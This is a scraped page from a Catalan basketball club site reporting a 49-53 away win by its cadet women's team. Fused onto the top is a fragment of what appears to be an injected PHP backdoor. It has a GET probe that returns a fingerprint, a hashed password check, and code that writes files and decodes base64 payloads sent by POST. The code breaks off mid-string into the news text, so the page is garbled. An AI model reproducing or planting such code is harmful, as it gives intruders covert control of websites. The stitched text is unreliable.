function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení A suma el cinquè triomf de la segona fase a la pista del Joviat La Salle (49-53) - Tgn Bàsquet Club -

El cadet femení A suma el cinquè triomf de la segona fase a la pista del Joviat La Salle (49-53)

Updated: març 11, 2015

El cadet femení A va aconseguir una important victòria, la cinquena de la segona fase, a la pista del Joviat La Salle. Va ser un partit estrany en què les jugadores del TGN Bàsquet van dominar amb claredat el matx gràcies a una bona sortida (8-21 en el primer quart) però que es va complicar en l’últim període. La bona circulació de pilota permetia les visitants trobar bones posicions de tir exterior i rebotejar en atac. Amb tot, la feina feta durant els trenta primers minuts gairebé se’n va en orris en els últims deu. Les noies del TGN no van anotar cap cistella en joc en tot l’últim quart i el parcial de 17-2 de les locals va estar a punt de fer perillar el triomf.